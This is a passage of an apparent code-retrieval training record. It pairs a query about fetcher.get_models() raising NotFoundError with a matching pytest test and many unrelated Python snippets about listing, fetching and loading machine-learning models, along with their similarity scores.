list_dashdb_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='DashDB 
In-database Model', fields=fields)\n\t\treturn models", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_object_models(self):\n parser = WorldParser(self.world_fpath)\n return parser.models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models" ]
[ "0.72766924", "0.66285986", "0.6556921", "0.6551836", "0.6296319", "0.626473", "0.6252031", "0.61985433", "0.61647654", "0.61226976", "0.61226976", "0.607028", "0.60465264", "0.6035401", "0.60337895", "0.59634507", "0.5959686", "0.5941662", "0.5922241", "0.59054995", "0.5881448", "0.58800495", "0.5876396", "0.5874023", "0.5873466", "0.58549595", "0.58486265", "0.58384407", "0.5836732", "0.5836436", "0.583402", "0.5810582", "0.5794254", "0.5777772", "0.5775588", "0.5757563", "0.5739123", "0.57334095", "0.56720334", "0.5661378", "0.5652023", "0.56377786", "0.5631584", "0.5621608", "0.5618088", "0.560951", "0.55985975", "0.5583852", "0.55837435", "0.55816126", "0.55813855", "0.5564015", "0.5559904", "0.5555106", "0.55467445", "0.5535004", "0.5524872", "0.55178165", "0.55164075", "0.55019075", "0.5494417", "0.5488901", "0.54820275", "0.547317", "0.5472669", "0.5472669", "0.54691017", "0.5454411", "0.54493785", "0.5444251", "0.54280853", "0.54223126", "0.5408609", "0.5398911", "0.5388666", "0.53881556", "0.53837216", "0.53810376", "0.53736496", "0.5360683", "0.5355761", "0.5354801", "0.53464097", "0.53386873", "0.53374624", "0.533371", "0.53264904", "0.5297019", "0.5296494", "0.52770877", "0.5276739", "0.5269682", "0.52637875", "0.5263602", "0.52500075", "0.52416027", "0.5228783", "0.5222408", "0.52181983", "0.52078575" ]
0.75294465
0
fetcher.get_models() should throw if a model is not found.
def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model): with pytest.raises(exceptions.NotFoundError) as exc: fc.get_models(project=project, model=model) assert "An error occured while getting models." in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def test_get_model_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n exception_message = \"\"\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"asdf\")\n except Exception as e:\n exception_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(exception_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def get_models(self):\n self.load()\n return self._models", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def check_models():\n # Check if Models exist\n if request.method == 'GET':\n if models_exist():\n return jsonify({'message': 'models found'})\n else:\n return jsonify({'message': 'one or more models missing'}), 409\n\n # Post Method, download models\n else:\n task = 
download_models.apply_async()\n task_url = url_for('model_download_status', task_id=task.id)\n return jsonify({'message': 'download started', 'location': task_url}), 202, {'Location': task_url}", "def try_models(self):\n result = os.system(\"python try_models.py\")\n return result == 0", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] = status_code\n return response_json\n except Exception as e:\n print((traceback.print_exc()))\n return exception_return(e, status_code)", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_coupledmodels_get(self):\n pass", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def get_models(make):\n api_url = 'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n 
app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def models() -> list[str]:\n return list(models_url.keys())", "def test_get_model(self) -> None:\n get_model()", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def test_get_model_metadata_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n excpeption_raised = False\n exception_message = None\n try:\n model_metadata = model_manager.get_model_metadata(qualified_name=\"asdf\")\n except Exception as e:\n excpeption_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(excpeption_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def get_model(model):\n all_models = cmd.get_object_list()\n\n if len(all_models) == 0:\n logging.parser_error('No models are opened.')\n return\n\n model = model.lower()\n\n if model and (model in all_models):\n return model\n\n if len(all_models) > 1:\n logging.parser_error(\"Please specify which model you want to use. 
{}\".format(all_models))\n return\n\n return all_models[0]", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_all_models() -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT manufacturer, description, modelnumber, weight\n FROM Model\"\"\"\n cur.execute(sql, ())\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n models = []\n for row in result:\n models.append(\n [row[0], row[1], row[2], row[3]]\n )\n\n cur.close()\n conn.close()\n return models\n except Exception as e:\n print(\"fff\")\n print(e)\n # If login failed, return None\n cur.close()\n conn.close()\n return []", "def test_get_model_method(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(type(model) is MLModelMock)", "def load_models(appname):\n return import_module('.models', appname)", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def test_model_get(self):\n response = self.client().get('/model')\n self.assertEqual(response.status_code, 200)\n loaded_model = Model.from_json(response.data.decode())\n self.assertEqual(loaded_model, self.data_manipulation.get_latest_model())\n\n # All versions are removed\n self.data_manipulation.versions = {}\n\n other_response = self.client().get('/model')\n self.assertEqual(other_response.status_code, 404)", "def get(self, request):\n 
MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n \"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _pc_load_models(model_name = None, mod_list = None, n_sample = None, verbose = False, **kwargs):\n\n if model_name is not None:\n mod_list = glob.glob(model_name + '*.out')\n if mod_list is None or mod_list == []:\n pc.log_.error('No model found', calling='load models')\n return None\n if n_sample is not None:\n if n_sample > len(mod_list):\n pc.log_.error('less models {0:d} than n_sample {1:d}'.format(len(mod_list), n_sample),\n calling='load models')\n return None\n mod_list = random.sample(mod_list, n_sample)\n m = []\n for outfile in mod_list:\n if outfile[-4::] == '.out':\n model_name = outfile[0:-4]\n else:\n model_name = outfile\n try:\n cm = pc.CloudyModel(model_name, verbose=0, **kwargs)\n if not cm.aborted:\n m.append(cm)\n if verbose:\n print('{0} model read'.format(outfile[0:-4]))\n except:\n pass\n pc.log_.message('{0} models read'.format(len(m)), calling='load_models')\n return m", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(self, app_label, model_name,\n seed_cache=True, only_installed=True):\n if seed_cache:\n self._populate()\n if only_installed and app_label not 
in self.app_labels:\n return None\n return self.app_models \\\n .get(app_label, SortedDict()) \\\n .get(model_name.lower())", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def availablemodels(self):\n return self.__models.keys()", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "async def list_models(\n list_models_request: ListModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/list_models endpoint\")\n logging.debug(f\"Request: {list_models_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().list_model_controller(\n request=list_models_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/list_models endpoint: {error}\")\n raise error", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(source: str, 
supported_model_name: str, model_id: str):\n connector = __get_connector(source)\n supported_model = __get_supported_model(supported_model_name)\n\n try:\n model = connector.get(supported_model, model_id)\n return __parse_response(source, model)\n except Exception as e:\n abort(500, e)", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def list_models():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_models\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)", "def get_models_from_table_names(table_names, force=None):\n models = []\n errors = []\n for table_name in table_names:\n try:\n models.append(\n get_model_from_table_name(table_name)\n )\n except (\n IncorrectTableNameException,\n ModelDoesNotExistException\n ) as exc:\n if not force:\n raise exc\n errors.append(exc.args)\n return models, errors", "def load_models_by_type(model_type):\n\n # loading the models for each language supported\n return [(lang_id, load_model(lang_id, model_type)) for lang_id in language_id_to_code_mapper]", "def load_best_model_json():\n with open(qualify_full_filepath(f\"models.json\", HERE), \"r\") as infile:\n models = json.load(infile)\n return models", "def _get_models_from_metafile(dir: str):\n meta_indexes = load(osp.join(dir, 'model-index.yml'))\n for meta_path in meta_indexes['Import']:\n # meta_path example: mmcls/.mim/configs/conformer/metafile.yml\n meta_path = osp.join(dir, meta_path)\n metainfo = load(meta_path)\n yield from metainfo['Models']", "def find_models(page_index=0):\n search_query = {\n 'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 
'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def iter_models(self):\n return iter(self.model_list)", "def get_model(params):\r\n module_name, class_name = params.model.name.rsplit('.', 1)\r\n i = importlib.import_module(module_name)\r\n return getattr(i, class_name)", "def load_models(model_base_name=None, num_voices=4):\n models = []\n for voice_index in range(num_voices):\n model_path_name = os.path.join(PACKAGE_DIR,\n 'models/' + model_base_name+ '_' + str(\n voice_index))\n model = load_model(model_path_name)\n model.compile(optimizer='adam',\n loss={'pitch_prediction': 'categorical_crossentropy'\n },\n metrics=['accuracy'])\n models.append(model)\n return models", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. 
otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def _load_predictiveModel(self):\n # type: () -> None\n\n for model in self.__MODELS:\n if isinstance(self._model, model):\n self._classLabels = self._model.classes_ # Assign the classes available in the classifier to the labels container.\n return\n\n raise InvalidModelException(\n \"Did not recieve a model that was one of the expected types. Use model_types() to see supported models. 
Recieved type {0}\".format(\n type(self._model)))", "def check_models_ready(self):\n if not self.models_ready:\n raise RuntimeError(\"Models aren't loaded yet.\")", "def load_model(seriesname):\n LOG.debug(\"Calling load_model() with the following arguments:\")\n LOG.debug(\"seriesname = %s\"%seriesname)\n \n result = []\n return result", "def _request_model(self, instance, success, get_embedded=True):\n coll = self.get_collection('_model')\n if get_embedded:\n callback = partial(self._get_embedded_model_names,\n instance=instance,\n success=success)\n else:\n callback = success\n\n try:\n instance['_model']\n except KeyError:\n raise tornado.web.HTTPError(400, 'Missing model key')\n coll.find_one({'_id': instance['_model']},\n callback=callback)", "def test_model_runs(self):\n\n for m in self.models:\n self.assertTrue(m is not None)\n self.assertTrue(isinstance(m, topic_model.TopicModel))", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def test_load_model_method(self):\n # arrange\n # instantiating the model manager class\n model_manager = ModelManager()\n\n # adding the model\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model_object = None\n # accessing the MLModelMock model object\n try:\n model_object = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n print_tb(e)\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(model_object is not None)", "def init_models(self):\n from ron import Application\n from ron.models.basemodel import BaseModel\n if self.models == None or not Application().db:\n return\n models_namespace = self.__namespace + \".models\" # TODO: allow customize this\n try:\n models_package = import_module(models_namespace)\n except:\n models_package = None\n if models_package:\n models_modules = self._get_package_modules(models_package)\n for model_name in models_modules:\n imported_model = import_module('.' 
+ model_name, package=models_namespace)\n for i in dir(imported_model):\n attribute = getattr(imported_model, i)\n if inspect.isclass(attribute) and issubclass(attribute, BaseModel):\n self.models.append(attribute)\n Application().db().database.create_tables(self.models)", "def models(self):\n return self.config.models()", "def load_models(model_dirs):\n models = []\n for directory in model_dirs:\n filenames = os.listdir(directory)\n for filename in filenames:\n if filename.endswith('.pth'):\n model_path = os.path.join(directory, filename)\n model = get_model()\n target_device = None if torch.cuda.is_available() else 'cpu'\n model.load_state_dict(torch.load(model_path, map_location=target_device))\n models.append(model)\n return models", "def get_model(self, id):\n if id not in self._models:\n raise Exception(f'model with the id {id} does not exist')\n return self._models[id]", "def check_models(*, schemas: _oa_types.Schemas) -> types.TModels:\n not_constructables = iterate.not_constructable(schemas=schemas)\n not_constructables_result = map(\n lambda args: (args[0], check_model(schemas, args[1])), not_constructables\n )\n return dict(not_constructables_result)", "def GetModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models" ]
